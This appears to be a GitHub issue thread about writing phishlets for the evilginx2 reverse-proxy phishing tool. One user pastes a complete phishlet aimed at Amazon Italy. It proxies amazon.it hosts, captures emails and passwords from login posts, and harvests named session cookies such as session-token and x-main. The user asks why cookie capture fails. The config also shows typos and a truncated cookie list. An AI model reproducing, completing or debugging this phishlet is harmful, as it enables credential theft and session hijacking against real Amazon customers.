Phishlets creation step by step

[yahirlevine]

Awesome tool! I have tried to play around with the script and create a new phishlet. However i get an error. There is no cookie and no username and password captured. I am possitive that i dont know how to create a new phishlet.

[Santa131]

Lay out the manual on creating a phishlet!

[kgretzky]

@yahirlevine Check the blog post part where I outlined how the phishlet files are structured and experiment with the ones already released. It is all about trial and error and checking the Network tab in Chrome, in Web Inspector, to see if all redirections worked properly.

@Santa131 I'm pretty confident this will get you banned sooner than I release the manual you wish so much for.

[maisonmargiela0]

kgretzky Please HELP ME!!!

Everytime I am write a phishlet even I only put a letter and delete it and save the .yaml document, I don't know why but the phishlet does not work anymore. It saves only the user and the pass but the token not. For example I have this phishlet who which has to go perfectly but it does not take the cookies.

author: '@amazonit' min_ver: '2.3.0' proxy_hosts:

• {phish_sub: 'www', orig_sub: 'www', domain: 'amazon.it', session: true, is_landing: true}
• {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', session: false, is_landing: false}
• {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false} sub_filters:
• {triggers_on: 'www.amazon.it', orig_sub: 'www', domain: 'amazon.it', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
• {triggers_on: 'www.amazon.it', orig_sub: 'www', domain: 'amazon.it', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
• {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
• {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
• {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']
• {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} auth_tokens:
• domain: '.amazon.it' keys: ['at-main','lc-main','sess-at-main','session-id','session-id-time','session-token','sst-main','ubid-main','x-main','skin','a-ogbcbff','at-acbit','i18n-prefs'$
• domain: '.www.amazon.it' keys: ['csm-hit'] credentials: username: key: 'email' search: '(.)' type: 'post' password: key: 'password' search: '(.)' type: 'post' login: domain: 'www.amazon.it' path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=itflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0'

PLEASE HELP ME!! I don't know why, as I already said, If I only write and save a phishlet made by you like outlook, after I save it it does not take the cookies anymore... I am using the droplet terminal. When I first install evilginx2 every phishlet is working fine!!!

THANK YOU FOR HELPING ME!!!